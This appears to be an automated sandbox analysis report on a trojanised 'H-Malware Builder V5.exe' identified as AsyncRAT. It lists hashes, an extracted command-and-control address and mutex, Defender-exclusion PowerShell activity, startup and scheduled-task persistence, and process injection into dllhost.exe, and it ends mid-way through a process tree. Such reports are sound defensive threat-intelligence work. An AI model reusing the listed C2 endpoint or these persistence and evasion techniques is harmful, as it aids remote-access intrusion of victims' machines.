asyncrat | c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e

Resubmissions

04/12/2024, 07:47

241204-jmh8dsyjgs 10

03/12/2024, 09:46

241203-lrs99szmav 10

Analysis

max time kernel
69s
max time network
145s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
03/12/2024, 09:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

H-Malware Builder V5.exe
Size

407KB
MD5

c8f6d76b4ae82978272bde392561c4f4
SHA1

80447d36fcf88cc9caa806db53e22d9468cc31ee
SHA256

c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e
SHA512

10fa87f050a9ceb658e443317158ef8b1dbaa9e183ec61b5e5e42adb562f7918d996134aba7f0bbad852def4d6b0824c7b9716628b554194d0fd95974de6b2ad
SSDEEP

12288:r5p4UNBN3aqeKNoRfwoZrHMBV9EwEcb8+DvtuWUb:r9N3aqPCRooZwBjEhcYcvYWUb

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

bay-helps.gl.at.ply.gg:36538

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Suspicious use of NtCreateUserProcessOtherParentProcess 25 IoCs

description	pid	Process	procid_target
PID 2844 created 428	2844	Stub.exe	5
PID 2252 created 428	2252	Stub.exe	5
PID 2524 created 428	2524	Stub.exe	5
PID 2992 created 428	2992	Stub.exe	5
PID 2440 created 428	2440	Stub.exe	5
PID 1524 created 428	1524	Stub.exe	5
PID 2548 created 428	2548	Stub.exe	5
PID 2116 created 428	2116	Stub.exe	5
PID 2000 created 428	2000	Stub.exe	5
PID 2476 created 428	2476	Stub.exe	5
PID 2888 created 428	2888	Stub.exe	5
PID 2596 created 428	2596	Stub.exe	5
PID 2760 created 428	2760	Stub.exe	5
PID 2208 created 428	2208	Stub.exe	5
PID 492 created 428	492	Stub.exe	5
PID 2352 created 428	2352	Stub.exe	5
PID 1436 created 428	1436	Stub.exe	5
PID 2840 created 428	2840	Stub.exe	5
PID 1880 created 428	1880	Stub.exe	5
PID 584 created 428	584	Stub.exe	5
PID 840 created 428	840	Stub.exe	5
PID 2092 created 428	2092	Stub.exe	5
PID 880 created 428	880	Stub.exe	5
PID 1696 created 428	1696	Stub.exe	5
PID 2836 created 428	2836	Stub.exe	5

Async RAT payload 12 IoCs

rat

resource	yara_rule
behavioral4/files/0x0007000000004e76-12.dat	family_asyncrat
behavioral4/memory/2844-247-0x0000000000650000-0x0000000000662000-memory.dmp	family_asyncrat
behavioral4/memory/2888-2234-0x0000000000B10000-0x0000000000B22000-memory.dmp	family_asyncrat
behavioral4/memory/584-4107-0x00000000006E0000-0x00000000006F2000-memory.dmp	family_asyncrat
behavioral4/memory/2712-5479-0x0000000000BF0000-0x0000000000C02000-memory.dmp	family_asyncrat
behavioral4/memory/2892-6198-0x00000000005A0000-0x00000000005B2000-memory.dmp	family_asyncrat
behavioral4/memory/1256-6395-0x00000000005D0000-0x00000000005E2000-memory.dmp	family_asyncrat
behavioral4/memory/1108-7760-0x0000000000180000-0x0000000000192000-memory.dmp	family_asyncrat
behavioral4/memory/1004-7880-0x0000000000820000-0x0000000000832000-memory.dmp	family_asyncrat
behavioral4/memory/2328-8599-0x00000000006F0000-0x0000000000702000-memory.dmp	family_asyncrat
behavioral4/memory/2164-10831-0x0000000000800000-0x0000000000812000-memory.dmp	family_asyncrat
behavioral4/memory/404-11480-0x0000000000AF0000-0x0000000000B02000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 55 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1668	powershell.exe
2384	powershell.exe
2556	powershell.exe
2152	powershell.exe
3068	powershell.exe
1056	powershell.exe
2428	powershell.exe
2276	powershell.exe
2376	powershell.exe
2072	powershell.exe
1400	powershell.exe
2832	powershell.exe
988	powershell.exe
1496	powershell.exe
1064	powershell.exe
2600	powershell.exe
1488	powershell.exe
952	powershell.exe
1076	powershell.exe
2800	powershell.exe
1496	powershell.exe
1620	powershell.exe
2700	powershell.exe
1740	powershell.exe
1924	powershell.exe
2352	powershell.exe
1084	powershell.exe
1420	powershell.exe
1656	powershell.exe
892	powershell.exe
916	powershell.exe
2164	powershell.exe
1100	powershell.exe
2004	powershell.exe
1108	powershell.exe
3024	powershell.exe
1648	powershell.exe
2760	powershell.exe
3004	powershell.exe
1968	powershell.exe
600	powershell.exe
2724	powershell.exe
2060	powershell.exe
1520	powershell.exe
236	powershell.exe
2216	powershell.exe
2212	powershell.exe
2680	powershell.exe
2076	powershell.exe
2328	powershell.exe
2328	powershell.exe
1924	powershell.exe
1512	powershell.exe
1708	powershell.exe
1324	powershell.exe

Drops startup file 25 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe	H-Malware Builder V5.exe

Executes dropped EXE 25 IoCs

pid	Process
2844	Stub.exe
2252	Stub.exe
2524	Stub.exe
2992	Stub.exe
2440	Stub.exe
1524	Stub.exe
2548	Stub.exe
2116	Stub.exe
2000	Stub.exe
2476	Stub.exe
2888	Stub.exe
2596	Stub.exe
2760	Stub.exe
2208	Stub.exe
492	Stub.exe
2352	Stub.exe
1436	Stub.exe
2840	Stub.exe
1880	Stub.exe
584	Stub.exe
840	Stub.exe
2092	Stub.exe
880	Stub.exe
1696	Stub.exe
2836	Stub.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\Tasks\$77Stub.exe	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$77Stub.exe	svchost.exe

Suspicious use of SetThreadContext 25 IoCs

description	pid	Process	procid_target
PID 2844 set thread context of 2564	2844	Stub.exe	34
PID 2252 set thread context of 2132	2252	Stub.exe	46
PID 2524 set thread context of 572	2524	Stub.exe	58
PID 2992 set thread context of 792	2992	Stub.exe	70
PID 2440 set thread context of 1872	2440	Stub.exe	82
PID 1524 set thread context of 1984	1524	Stub.exe	94
PID 2548 set thread context of 404	2548	Stub.exe	106
PID 2116 set thread context of 2656	2116	Stub.exe	118
PID 2000 set thread context of 2364	2000	Stub.exe	130
PID 2476 set thread context of 2020	2476	Stub.exe	142
PID 2888 set thread context of 872	2888	Stub.exe	154
PID 2596 set thread context of 1872	2596	Stub.exe	269
PID 2760 set thread context of 2424	2760	Stub.exe	178
PID 2208 set thread context of 344	2208	Stub.exe	190
PID 492 set thread context of 588	492	Stub.exe	202
PID 2352 set thread context of 1508	2352	Stub.exe	308
PID 1436 set thread context of 3048	1436	Stub.exe	226
PID 2840 set thread context of 1128	2840	Stub.exe	312
PID 1880 set thread context of 2960	1880	Stub.exe	250
PID 584 set thread context of 1968	584	Stub.exe	262
PID 840 set thread context of 1612	840	Stub.exe	274
PID 2092 set thread context of 2216	2092	Stub.exe	528
PID 880 set thread context of 1488	880	Stub.exe	298
PID 1696 set thread context of 1220	1696	Stub.exe	615
PID 2836 set thread context of 1628	2836	Stub.exe	556

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2468	SCHTASKS.exe
492	SCHTASKS.exe
1532	SCHTASKS.exe
2472	SCHTASKS.exe
2172	SCHTASKS.exe
2320	SCHTASKS.exe
536	SCHTASKS.exe
1972	SCHTASKS.exe
348	SCHTASKS.exe
2960	SCHTASKS.exe
1736	SCHTASKS.exe
1736	SCHTASKS.exe
2372	SCHTASKS.exe
2460	SCHTASKS.exe
1408	SCHTASKS.exe
1100	SCHTASKS.exe
2560	SCHTASKS.exe
1512	SCHTASKS.exe
2236	SCHTASKS.exe
2072	SCHTASKS.exe
2236	SCHTASKS.exe
3056	SCHTASKS.exe
2228	SCHTASKS.exe
1252	SCHTASKS.exe
1700	SCHTASKS.exe
2648	SCHTASKS.exe
2540	SCHTASKS.exe
2588	SCHTASKS.exe
1888	SCHTASKS.exe
1904	SCHTASKS.exe
2624	SCHTASKS.exe
2344	SCHTASKS.exe
1664	SCHTASKS.exe
2504	SCHTASKS.exe
2988	SCHTASKS.exe
2240	SCHTASKS.exe
2836	SCHTASKS.exe
2492	SCHTASKS.exe
2316	SCHTASKS.exe
1940	SCHTASKS.exe
2508	SCHTASKS.exe
2744	SCHTASKS.exe
2372	SCHTASKS.exe
1204	SCHTASKS.exe
2684	SCHTASKS.exe
988	SCHTASKS.exe
1764	SCHTASKS.exe
1400	SCHTASKS.exe
2376	SCHTASKS.exe
2752	SCHTASKS.exe
2132	SCHTASKS.exe
2828	SCHTASKS.exe
2608	SCHTASKS.exe
2880	SCHTASKS.exe
536	SCHTASKS.exe
2548	SCHTASKS.exe
2272	SCHTASKS.exe
3064	SCHTASKS.exe
2512	SCHTASKS.exe
1540	SCHTASKS.exe
1508	SCHTASKS.exe
1660	SCHTASKS.exe
1496	SCHTASKS.exe
1972	SCHTASKS.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2760	powershell.exe
2844	Stub.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2936	powershell.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2680	powershell.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2564	dllhost.exe
2252	Stub.exe
2132	dllhost.exe
2132	dllhost.exe
2132	dllhost.exe
2132	dllhost.exe
2132	dllhost.exe
2132	dllhost.exe
2132	dllhost.exe
2132	dllhost.exe
2160	powershell.exe
2132	dllhost.exe
2132	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2844	Stub.exe
Token: SeDebugPrivilege	2844	Stub.exe
Token: SeDebugPrivilege	2564	dllhost.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2252	Stub.exe
Token: SeDebugPrivilege	2252	Stub.exe
Token: SeDebugPrivilege	2132	dllhost.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	2524	Stub.exe
Token: SeDebugPrivilege	2524	Stub.exe
Token: SeDebugPrivilege	572	dllhost.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	600	powershell.exe
Token: SeDebugPrivilege	2992	Stub.exe
Token: SeDebugPrivilege	2992	Stub.exe
Token: SeDebugPrivilege	792	dllhost.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	2440	Stub.exe
Token: SeDebugPrivilege	2440	Stub.exe
Token: SeDebugPrivilege	1872	dllhost.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	1524	Stub.exe
Token: SeDebugPrivilege	1524	Stub.exe
Token: SeDebugPrivilege	1984	dllhost.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	2548	Stub.exe
Token: SeDebugPrivilege	2548	Stub.exe
Token: SeShutdownPrivilege	1260	Explorer.EXE
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeShutdownPrivilege	1260	Explorer.EXE
Token: SeShutdownPrivilege	1260	Explorer.EXE
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	2072	powershell.exe
Token: SeDebugPrivilege	2116	Stub.exe
Token: SeDebugPrivilege	2116	Stub.exe
Token: SeDebugPrivilege	2656	dllhost.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	492	powershell.exe
Token: SeAuditPrivilege	848	svchost.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	2000	Stub.exe
Token: SeDebugPrivilege	2000	Stub.exe
Token: SeDebugPrivilege	2364	dllhost.exe
Token: SeAuditPrivilege	848	svchost.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1484	conhost.exe
2880	conhost.exe
3028	conhost.exe
844	conhost.exe
1552	conhost.exe
1256	conhost.exe
3008	conhost.exe
2220	conhost.exe
2032	conhost.exe
2656	conhost.exe
2952	conhost.exe
2736	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1884 wrote to memory of 2760	1884	H-Malware Builder V5.exe	30
PID 1884 wrote to memory of 2760	1884	H-Malware Builder V5.exe	30
PID 1884 wrote to memory of 2760	1884	H-Malware Builder V5.exe	30
PID 1884 wrote to memory of 2844	1884	H-Malware Builder V5.exe	32
PID 1884 wrote to memory of 2844	1884	H-Malware Builder V5.exe	32
PID 1884 wrote to memory of 2844	1884	H-Malware Builder V5.exe	32
PID 1884 wrote to memory of 2064	1884	H-Malware Builder V5.exe	33
PID 1884 wrote to memory of 2064	1884	H-Malware Builder V5.exe	33
PID 1884 wrote to memory of 2064	1884	H-Malware Builder V5.exe	33
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 2564	2844	Stub.exe	34
PID 2844 wrote to memory of 3056	2844	Stub.exe	35
PID 2844 wrote to memory of 3056	2844	Stub.exe	35
PID 2844 wrote to memory of 3056	2844	Stub.exe	35
PID 2564 wrote to memory of 428	2564	dllhost.exe	5
PID 2564 wrote to memory of 472	2564	dllhost.exe	6
PID 2564 wrote to memory of 488	2564	dllhost.exe	7
PID 2564 wrote to memory of 496	2564	dllhost.exe	8
PID 2564 wrote to memory of 608	2564	dllhost.exe	9
PID 2564 wrote to memory of 684	2564	dllhost.exe	10
PID 2564 wrote to memory of 768	2564	dllhost.exe	11
PID 2564 wrote to memory of 812	2564	dllhost.exe	12
PID 2564 wrote to memory of 848	2564	dllhost.exe	13
PID 2564 wrote to memory of 972	2564	dllhost.exe	15
PID 2564 wrote to memory of 276	2564	dllhost.exe	16
PID 2564 wrote to memory of 756	2564	dllhost.exe	17
PID 2564 wrote to memory of 1044	2564	dllhost.exe	18
PID 2564 wrote to memory of 1132	2564	dllhost.exe	19
PID 2564 wrote to memory of 1180	2564	dllhost.exe	20
PID 2564 wrote to memory of 1260	2564	dllhost.exe	21
PID 2564 wrote to memory of 1308	2564	dllhost.exe	23
PID 2564 wrote to memory of 1536	2564	dllhost.exe	24
PID 2564 wrote to memory of 1636	2564	dllhost.exe	25
PID 2564 wrote to memory of 2856	2564	dllhost.exe	26
PID 2564 wrote to memory of 2640	2564	dllhost.exe	27
PID 2564 wrote to memory of 2844	2564	dllhost.exe	32
PID 2564 wrote to memory of 2064	2564	dllhost.exe	33
PID 2564 wrote to memory of 3056	2564	dllhost.exe	35
PID 3056 wrote to memory of 2936	3056	cmd.exe	37
PID 3056 wrote to memory of 2936	3056	cmd.exe	37
PID 3056 wrote to memory of 2936	3056	cmd.exe	37
PID 2564 wrote to memory of 2204	2564	dllhost.exe	36
PID 2564 wrote to memory of 2936	2564	dllhost.exe	37
PID 2844 wrote to memory of 1648	2844	Stub.exe	38
PID 2844 wrote to memory of 1648	2844	Stub.exe	38
PID 2844 wrote to memory of 1648	2844	Stub.exe	38
PID 2564 wrote to memory of 1648	2564	dllhost.exe	38
PID 2844 wrote to memory of 988	2844	Stub.exe	40
PID 2844 wrote to memory of 988	2844	Stub.exe	40
PID 2844 wrote to memory of 988	2844	Stub.exe	40
PID 2564 wrote to memory of 988	2564	dllhost.exe	40
PID 2564 wrote to memory of 1648	2564	dllhost.exe	38
PID 2564 wrote to memory of 2268	2564	dllhost.exe	39
PID 2564 wrote to memory of 988	2564	dllhost.exe	40

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:428
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{768d1b33-3f80-40a2-a15c-816fc545cb41}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2564
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{690b2055-6b64-4101-9dd1-a732fb92d43e}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2132
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1574e373-5f4c-4c86-b152-b8830a21d9e0}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:572
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8a50dae3-a928-4fa3-b9b5-1fd422fed1fe}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:792
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8fa9e6b3-35ba-4744-9ccd-943c6678c56b}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8339d005-b373-4909-a791-4938f375416c}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5f229985-5447-4ee3-bfa2-568c0af40d10}
  2⤵
  PID:404
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3cc6655f-b0cd-431a-9375-8df84b7dd2dc}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{84ce1d37-dd51-42ed-a4f4-ffa8b4c6c864}
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2364
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{486bba9b-3aad-4a5d-88d8-914ba3fce90b}
  2⤵
  PID:2020
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{37387694-23e6-4352-915c-e8d3881214f3}
  2⤵
  PID:872
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{eb771237-4556-4aac-bdf0-1b196b88039b}
  2⤵
  PID:1872
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0bc19027-eee4-471f-a2b1-9d3bbd4845e4}
  2⤵
  PID:2424
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1f8694ee-8eb4-4ca8-9fac-65650d9009bb}
  2⤵
  PID:344
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3bd110b6-0762-4231-bed5-6e866149581a}
  2⤵
  PID:588
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4fc79dc4-c498-4555-8c1d-31aa80d3ae19}
  2⤵
  PID:1508
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{22c71a52-aade-483e-a36e-d3a02990bcc6}
  2⤵
  PID:3048
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{22b42408-94af-4d78-8cdc-1183f6359386}
  2⤵
  PID:1128
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{88ee6293-bedf-4697-b1a4-9291206e3802}
  2⤵
  PID:2960
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e57736d5-6112-4c48-b87f-1e3ce6cc7e0f}
  2⤵
  PID:1968
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{948c8dd0-ad33-42ea-b5cf-5e6e5b6aae69}
  2⤵
  PID:1612
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f6170f35-72a8-4406-a101-199feaef8a29}
  2⤵
  PID:2216
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9bdf8fed-650d-4e0d-998b-24b334798ab0}
  2⤵
  PID:1488
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1385488e-9d82-4c51-a7d1-e5de0c84912a}
  2⤵
  PID:1220
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{241250e6-5acc-4c62-839c-7af944bc7e0f}
  2⤵
  PID:1628
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{687d586d-eb51-4c75-8773-fbf3d8f97f91}
  2⤵
  PID:2624
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{58508506-9eea-4be7-994c-659338109c76}
  2⤵
  PID:2100
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{116ce07d-c02d-4e47-acea-3a0dfed52964}
  2⤵
  PID:3024
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f99d0237-f97b-4ff1-b7df-5ff98d48936f}
  2⤵
  PID:1776
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6db2df85-b571-482b-9533-918b5bb3aa20}
  2⤵
  PID:844
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{80860c6a-f9f0-4e6b-aa34-66c08e9122ab}
  2⤵
  PID:2196
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{626d0715-edd5-45d6-a9a2-27e549b51672}
  2⤵
  PID:2184
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{767f3ea2-36b7-4ee3-a892-efbb7a3a4b1d}
  2⤵
  PID:2276
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d34194c0-b321-4726-a215-30e5fe459256}
  2⤵
  PID:2428
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dc6de896-69b5-4fda-b598-83f651f4b252}
  2⤵
  PID:2512
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{89d0d596-c945-4859-981a-00a6b2e7f739}
  2⤵
  PID:2576
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{50f111a0-57fc-49aa-892b-0608eb515be3}
  2⤵
  PID:2628
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{18bc8396-affa-4d87-8c9f-f9163886f85b}
  2⤵
  PID:2320
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bf8375ab-8460-4977-9bcd-b1d6e8afcf49}
  2⤵
  PID:2668
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2dffea2d-feb9-4b72-869f-7e9addc11902}
  2⤵
  PID:1088
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9f15bbb2-e75e-4be1-b481-8d1484c14d4a}
  2⤵
  PID:2680
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6f989b0b-7cad-4ff4-bd9f-f926740a3424}
  2⤵
  PID:1692
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{431ddf7f-1002-4d4f-b0cb-4c4cdc057269}
  2⤵
  PID:2940
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b90a8769-af79-47d2-9809-d4f6dfe38c29}
  2⤵
  PID:2184
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{10b7ee3d-2f3e-4d4e-a461-79fd9773f28f}
  2⤵
  PID:3012
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{842cc8fc-3322-44d7-9323-0c2f74bab150}
  2⤵
  PID:936
- C:\Windows\System32\dllhost.exe
